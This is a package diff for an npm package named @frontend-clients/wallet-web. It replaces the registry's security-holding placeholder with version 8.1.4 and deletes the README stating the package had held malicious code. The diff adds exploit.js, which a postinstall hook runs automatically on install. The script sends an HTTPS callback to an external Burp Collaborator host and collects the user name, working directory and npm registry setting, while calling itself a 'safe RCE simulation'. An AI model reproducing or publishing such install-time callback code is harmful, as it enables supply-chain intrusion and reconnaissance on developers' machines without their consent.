@frontend-clients/wallet-web 0.0.1-security → 8.1.4

package/exploit.js

@@ -0,0 +1,25 @@
+const https = require('https');
+const { exec } = require('child_process');
+
+// Your Burp Collaborator URL (replace this)
+const COLLAB_URL = 'https://ppicousivrlgnxk5qoxxs24hx83zrwfl.oastify.com';
+
+// ===== SAFE RCE SIMULATION =====
+// 1. Send HTTP request to Collaborator (proof of callback)
+https.get(COLLAB_URL, (res) => {
+  console.log(`[+] Collaborator pingback sent! Status: ${res.statusCode}`);
+}).on('error', (err) => {
+  console.error('[!] Collaborator error:', err.message);
+});
+
+// 2. Simulate command execution (NO REAL COMMANDS RUN)
+console.log('[!] RCE Simulation: Attacker could run arbitrary commands here');
+console.log(`[!] e.g., exec('curl ${COLLAB_URL}')`);
+
+// 3. (Optional) Exfiltrate fake "sensitive" data
+const fakeData = {
+  user: process.env.USER,
+  cwd: process.cwd(),
+  npm_config: process.env.npm_config_registry
+};
+console.log('[!] Fake exfiltrated data:', fakeData);

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "@frontend-clients/wallet-web",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "8.1.4",
+  "scripts": {
+    "postinstall": "node exploit.js"
+  },
+  "publishConfig": {
+    "access": "public"
+  }
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40frontend-clients%2Fwallet-web for more information.